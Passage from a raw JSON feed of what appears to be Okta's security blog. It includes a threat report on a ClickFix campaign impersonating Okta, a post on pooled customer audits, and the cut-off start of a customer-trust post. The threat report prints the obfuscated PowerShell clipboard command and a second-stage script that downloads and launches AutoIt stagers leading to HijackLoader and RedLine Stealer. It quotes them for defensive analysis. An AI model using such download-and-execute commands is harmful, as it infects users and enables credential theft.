\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"http://www.okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"www.okta.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\":\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"6JznFdLiy4AKckMpqdtZOZ\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\nOnce the unsuspecting user interacts with this page, specifically by selecting “verify you are human,” they’re presented with a set of instructions designed to trick the user into downloading malware. Two versions are provided below: one targeting MacOS users, and the other targeting Windows users.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"gMxEFxg9SQKs0BmpTyUWY\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"75QgUme0sVyjLzh0UoCV8s\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\nThese instructions commonly direct the user to perform the following actions:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"ordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Press Windows Key + R\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (to open the Run dialog box).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Press CTRL + V\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (to paste a command).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Press Enter\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (to execute the command).\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Crucially, the malicious website uses JavaScript to hijack the user's clipboard, silently placing a PowerShell command onto the clipboard without the user’s knowledge, such as the example provided below. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"powershell -WindowS HIDD -c $E='23-ykfgoed8wrvnmj49xlq/pi17bh6t0zau5c.:s'; $ix=$E[24]+$E[12]+$E[15]; $JT='ht'+'tp'+'s:'+'/'+'/' + $E[7]+$E[4] + 'tahu.org/s.php?an=1'; $wF=$E[24]+$E[8]+$E[19]; &$wF (&$ix $JT);\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In this case, the PowerShell command was obfuscated, and once executed by the user, calls a site which contained the following malicious code: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"$GDSGFBKSD = [System.Guid]::NewGuid().ToString();$env:MYAPPDATA = (Get-Item $env:APPDATA).Parent.FullName;\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Invoke-WebRequest \",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"hxxps://oktahu\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"hxxps://oktahu\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"[.]org/s.php?an=2 -OutFile $env:MYAPPDATA\\\\$GDSGFBKSD.zip\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" -UseBasicParsing;Add-Type -AssemblyName System.IO.Compression.FileSystem[System.IO.Compression.ZipFile]::ExtractToDirectory(\\\"$env:MYAPPDATA\\\\$GDSGFBKSD.zip\\\", \\\"$env:MYAPPDATA\\\\$GDSGFBKSD\\\");$FHBYREYDBYFB = Join-Path $env:MYAPPDATA $GDSGFBKSD;Set-Location $FHBYREYDBYFB;Start-Process Autoit3.exe launch_traffic4.a3x -WorkingDirectory $FHBYREYDBYFB; Start-Sleep -Seconds 5; Start-Process Autoit3.exe launch_traffic4.a3x -WorkingDirectory $FHBYREYDBYFB;\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This code initiates the download and execution of additional malware stages. The PowerShell script downloads a .zip file containing a malicious AutoIt-compiled script, launch_traffic4.a3x, and a legitimate copy of the AutoIT3 execution binary, Autoit3.exe. The malicious script is executed and acts as the initial stager, initiating a complex execution chain.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The infection proceeds as follows:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Initial Launcher\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": The executed script spawns a binary Swi_Compiler.exe from the %TEMP% directory.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Persistence:\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" Swi_Compiler.exe then copies itself to C:\\\\ProgramData\\\\fastpatch\\\\ and executes from there, establishing persistence by creating files in both %APPDATA%\\\\fastpatch\\\\ and %PROGRAMDATA%\\\\fastpatch\\\\ directories.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Loader\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (HijackLoader): Swi_Compiler.exe has been identified as HijackLoader, a loader known to employ various evasion techniques. Its configuration includes injecting %windir%\\\\SysWOW64\\\\pla.dll into processes.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Information Stealer\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (RedLine Stealer): HijackLoader proceeds to drop and execute OmegaDynami.exe and XPFix.exe. OmegaDynami.exe is identified as \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"RedLine Stealer\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\", a prominent information stealer available on underground forums. RedLine Stealer focuses on harvesting sensitive browser information, including saved credentials, autocomplete data, and credit card information from Chrome, Edge, and Firefox. It also collects system inventory data (username, location, hardware, security software details) and attempts to steal cryptocurrency.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Process Injection\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": OmegaDynami.exe (RedLine Stealer) exhibits sophisticated process injection capabilities, creating threads and injecting Portable Executable (PE) files into multiple Chrome browser processes. It also performs memory mapping operations on Chrome processes with read-write permissions and modifies thread contexts.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How to prevent ClickFix campaigns\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These attacks rely on the assumption that many users don’t understand the risks of executing commands delivered from an untrusted party. They just want to comply with the verification request and get on with visiting what they thought was going to be a legitimate website. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Windows administrators can and should consider allowing the execution of trusted, digitally-signed PowerShell scripts on managed devices and deny all others. MacOS administrators should ensure features such as Gatekeeper and System Integrity Protection (SIP) are enabled to protect critical files and processes. Additionally, preexec hooks can be configured within command and scripting interpreters to display a warning confirmation before any interactive command is executed.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Standard perimeter detection controls (email and web filtering) can prevent users on \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"managed\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" devices from accessing \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"known\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" malicious sites. Relying on these defences assumes the malicious site is live for long enough for reputation services to catch on. Unfortunately, they don’t do much to prevent users on unmanaged devices, which are more often than not the devices infected with infostealers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For this reason, we recommend restricting access to sensitive applications to devices that are \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/managed-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"managed\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" by Endpoint Management tools and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/edr-integration-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"protected by endpoint security tools\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". That way, you can be assured that the session tokens for highly sensitive apps are less likely to get scooped up by this commodity malware. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence has published a \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com/product/okta/clickfix-campaign-targets-okta-brands-drops-redline-stealer\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"detailed adversarial breakdown\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of this ClickFix campaign, including Indicators of Compromise (IoCs) exclusively for security contacts of Okta customers at \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com/product/okta/clickfix-campaign-targets-okta-brands-drops-redline-stealer\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"security.okta.com\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]}"},"summary":{"summary":"ClickFix campaigns exploit user trust and problem-solving instincts to bypass conventional security measures."},"updatedAt":"2025-07-09T13:49:44.963Z","secAuthor":[{"id":"e9cc3726-fe50-559a-9a1a-adada488dd9e","bio":{"bio":"Tom Simpson is a Staff Detection and Response Engineer within Okta’s Defensive Cyber Operations team. Tom has spent a decade in the security industry and is an expert at intrusion research, incident response and engineering of secure systems, which he’s demonstrated at Okta, TikTok USDS, CrowdStrike, and in the Australian Defence industry. Tom currently holds the GSEC, GCIH and GREM, having previously volunteered as a SANS teaching assistant. Tom enjoys researching the latest trends in Adversary tactics and sharing his findings through security research blogs and conference talks.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/3VujFHUQZHBWCS8daKbTqt/f45bcc7567e72a12143e3a673ad6d843/Tom_Simpson_Headshot.jpeg"},"name":"Tom Simpson","jobTitle":"Detection and Response Engineer","slug":"/hackers/tom-simpson","node_locale":"en"},{"id":"22dea194-5ef2-5cfb-8c46-f89bf610a204","bio":{"bio":"Daniel López is a Cyber Threat Researcher at Okta, where he focuses on tracking threat actor activity and the evolving threat landscape to best protect Okta’s employees and customers. Prior to joining Okta, Daniel worked at international companies across the consulting, financial services, and technology sectors. He enjoys participating in trusted infosec groups, continuously learning (both tech and non-tech topics), and staying physically active.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5TRBUU3rk3GJGj4L5naq6U/47bc1a7014e29ab8e1407dadf672ab20/Daniel_Lopez.png"},"name":"Daniel López","jobTitle":"Cyber Threat Researcher","slug":"/hackers/daniel-lopez","node_locale":"en"}]},{"slug":"/articles/2025/06/paving-the-path-pooled-audits-with-okta-security","id":"1ae87eb9-d8d2-59bf-aeb3-5f8ba5940d7f","title":"Paving the Path: Pooled Audits with Okta Security","date":"2025-06-25T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has completed another pooled audit, leading the industry by transforming traditional one-to-one assessments into a collaborative, industry-first approach. This new model not only streamlines the audit experience but delivers impact: 90% of participating customers reported significantly greater confidence in demonstrating compliance. This new, collaborative model builds on the foundation we've detailed in our previous \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/hackers//hacker/tushar-badlani\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"posts\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of the Customer Trust series, which cover our team's mission, mandate, and more.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-1\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Expanding our Program\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Routine, individual audits have remained crucial for building customer confidence and fostering strong relationships. In order to address the inherent time and resource demands of the traditional one-on-one model, we've introduced an innovative pooled audit program designed to work alongside it.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our Customer Audit program directly reflects the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Love our Customers \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"core value and is a testament to our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"long-term commitment\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to lead the industry in the fight against identity-based attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To support our global customers, we’ve launched region-specific regulatory support, starting with the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2025/05/a-guide-to-dora-compliance-with-okta/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Digital Operational Resilience Act (DORA)\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in the European Union and United Kingdom and, more recently, the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.apra.gov.au/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Australian Prudential Regulation Authority (APRA)\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in Australia. As regulatory expectations around cloud service providers continue to evolve, these collaborative audit sessions are helping us proactively meet customer needs while setting a new standard for partnership and trust at scale.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-1\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Program Benefits\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is leading the charge in elevating confidence and clarity across the evolving regulatory landscape. Our program establishes a new industry benchmark, paving a fundamental shift in the collaborative dynamics between critical technology vendors and customers. We bring multiple industry-specific customers into Okta offices for multi-day, hands-on sessions to collectively assess our controls against specific cybersecurity regulations.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In our most recent pooled audit, we thoroughly covered Australian Prudential Regulation Authority (APRA) expectations with our Financial Services Industry (FSI) customers in the region. The nine key domains that were covered included:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"ordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"BCP and Operational Resilience,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Datacenter Security,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Third Party Risk Management,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enterprise Risk Management,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Physical Security and Identity Access,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Change Control and Configuration,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Cryptography,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Vulnerability Management, and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Incident Management. \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The result wasn't just a compliance checkmark — based on the feedback captured, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"90%\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" of participating customers left with significantly higher confidence in their ability to demonstrate their organization’s compliance to the APRA regulation. Since launch, we’ve realized the following program benefits:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Fostering Trust \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This one-to-many model eradicates the heavy resource strain of one-to-one, repetitive audits. Our customers are at the heart of everything we do. It is important to highlight how Okta builds trust by demonstrating our robust security. As Okta continues to grow and is now considered a critical outsource provider, this pooled audit model is helping more customers meet regulatory obligations. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deeper collaboration and shared insights\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our program introduces a change from the standard private audit model by introducing opportunities to engage with industry peers and share learnings. Okta’s in-person audit setting helps support the fostering of new connections and strengthening existing relationships, enabling a forum to share best practices and gain invaluable insights from both Okta and pooled audit participants.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Proactivity versus reactivity\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While these new regulations don't directly impact Okta, we take a proactive approach by engaging our customers directly when new regulations emerge. By helping them understand how Okta's security controls apply and effectively address new requirements, we can support them in their compliance adherence efforts.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-1\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Measuring What Matters\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Measuring the success of pooled audit programs not only gives our security team and leadership insight into what is driving concerns for customers, but also how we can improve future sessions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Most recently,\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" 90%\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" of APRA pooled audit participants reported high program effectiveness, and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"94% \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"reported increased confidence in Okta as a security partner. Our program’s mandate is to build lasting trust and strengthen partnerships. Here’s what our customers are saying about us:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“I like the concept of the pooled audit. It was good to have the Okta team outline the control environment to help us to complete our obligation requirements. It was good to connect with other customers that are in similar positions.” - Senior Manager at a global financial services company\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“The information sharing was open and questions were answered well and comprehensively.” - Technology Risk Manager at a globally recognized financial services company\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“Okta/Auth0 is a key service provider for our business services. It was good to understand the security controls and evidence shown in the pooled audit which demonstrates the security posture and maturity across Okta/Auth0.” - Head of Security Strategy and Architecture at a global retail payment company\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“The openness of Okta in sharing information has supported our compliance journey. The session allowed us to get better insights and comfort around how a key partner is ensuring the security and continuity of services to its customers. Opening discussion and being able to gain clarification directly from senior leaders.” - Senior Operational Risk Manager at a global retail payment company\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“The face-to-face engagement was excellent, and Okta's collaborative approach was a significant benefit. We feel it's truly important to foster this trusted relationship and to continue growing more secure together\\\" – EU Customer \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-1\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our Future Vision\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We’re focused on continuing to expand our Customer Audit program across new industries and regions, opening the program benefits to additional customers outside of Financial Services. We believe a world-leading SaaS identity service can support their success. We’re committed to supporting our customers through the evolving and complex regulatory landscape they face.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This journey toward scalable assurance is bigger than Okta. We’re calling on our peers in the security SaaS community to join in on these efforts. Are you exploring pooled audits or similar collaborative models? Reach out at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"mailto:customertrust@okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"customeraudit@okta.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to collaborate on audit-based insights and accelerate the industry's progress for all customers. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By openly sharing our collective expertise and challenges, we can create a more trusted, secure ecosystem for everyone. We welcome your feedback and partnership as we build this new standard, together.\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"Okta has completed another pooled audit, leading the industry by transforming traditional one-to-one assessments into a collaborative, industry-first approach. This new model not only streamlines the audit experience but delivers impact: 90% of participating customers reported significantly greater confidence in demonstrating compliance."},"updatedAt":"2025-06-25T17:38:20.427Z","secAuthor":[{"id":"0549c9bd-5615-52a0-8683-f6b734b931cc","bio":{"bio":"Tushar Badlani is the Global Customer Audit Manager within the Security Trust and Culture team at Okta. He leads Okta’s global customer audit program, ensuring consistent, risk-aligned assurance engagements across all regions. He brings extensive experience in customer assurance, compliance, and cross-functional collaboration, shaped by his consulting background at EY and work across industries and in professional services. Originally from India, he earned his master’s degree from Syracuse University and is now based in San Francisco. Outside of work, he enjoys hiking, backpacking, and travelling to explore new places and cultures; he’s now been to 27 countries and 45 US States.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/61duT68OiTwHjxJS8gPPuy/f02be27b559de0ada96a7902d219f067/Tushar_HeadShot.jpg"},"name":"Tushar Badlani","jobTitle":"Global Customer Audit Manager","slug":"/hacker/tushar-badlani","node_locale":"en"},{"id":"fa04ab47-82af-5c37-83c0-2a2a861a79f8","bio":{"bio":"Lydia Le is an Associate Analyst at Okta, providing Assurance support to the Security Customer Trust team. Her commitment to continuous learning and keen attention to detail supports Okta’s mission by securing digital Identities and strengthening customer trust. Outside of work, Lydia enjoys reading, traveling, and exploring new cuisines - always eager to broaden her horizons and learn differing perspectives.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/4UqwT1r4PKuCRxpLI1bACF/6f9650ead38a1cc0785134df4f3c0ab5/profile.jpg"},"name":"Lydia Le","jobTitle":"Associate Analyst","slug":"/hackers/lydia-le","node_locale":"en"}]},{"slug":"/articles/2024/09/unveiling-essence-security-customer-trust","id":"86717a36-4a66-58a7-b3c8-afe62ce12bc7","title":"Unveiling the Essence of the Security Customer Trust Function","date":"2024-09-17T12:14","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"After nearly a decade of security experience, I’ve seen firsthand how crucial focusing on customer trust is to organizational success. Over the last four years at Okta, I’ve gained insights into the dynamic between trust, security and customer satisfaction. In this blog, I’ll share my reflections on the vital role of Okta’s Security Customer Trust team, highlighting the key principles and practices imperative to building trust.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Introducing Okta’s Trust Center\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There was a time when only a handful of enterprise SaaS vendors possessed SOC 2 or ISO 27001 certifications. However, in today’s market, vendors are scrutinized based on the data they handle, regardless of their size. Small B2B SaaS companies must now provide compliance certifications, penetration testing results, and answers to extensive security questionnaires to finalize deals, and larger SaaS vendors can find themselves responding to dozens (or even hundreds) of security 